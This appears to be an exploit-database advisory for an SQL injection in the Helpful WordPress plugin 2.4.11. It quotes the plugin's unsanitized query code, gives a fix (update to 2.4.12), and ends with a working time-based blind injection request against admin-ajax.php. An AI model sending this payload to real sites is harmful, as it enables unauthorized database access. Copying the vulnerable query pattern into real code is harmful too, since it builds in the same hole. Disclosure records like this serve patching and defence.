Helpful 2.4.11 Sql Injection - Wordpress Plugin

vendor:

Helpful Plugin

by:

Numan Türle

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Helpful Plugin

Affected Version From: 2.4.11

Affected Version To: 2.4.11

Patch Exists: YES

Related CWE: N/A

CPE: 2.4.11

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2019

Helpful 2.4.11 Sql Injection – WordPress Plugin

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'post_id' parameter of the 'helpful_ajax_pro' AJAX action of the 'helpful' plugin before using it in a SQL query. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database, allowing to read, modify or delete data, compromise vulnerable system and potentially compromise other systems. The vulnerability is confirmed in version 2.4.11. Other versions may also be affected.

Mitigation:

Update to version 2.4.12 or later.

Source

Exploit-DB raw data:

Title: Helpful 2.4.11 Sql Injection  - Wordpress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle


core/Core.class.php
// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );

// set args for insert command
$args = array(
'post_id' => $_REQUEST['post_id'],
'user' => $_REQUEST['user'],
'pro' => $_REQUEST['pro'],
'contra' => $_REQUEST['contra']
);
$result = $this->insert( $args );

@params = 'post_id' => $_REQUEST['post_id'],
call function insert -->

if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");



Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1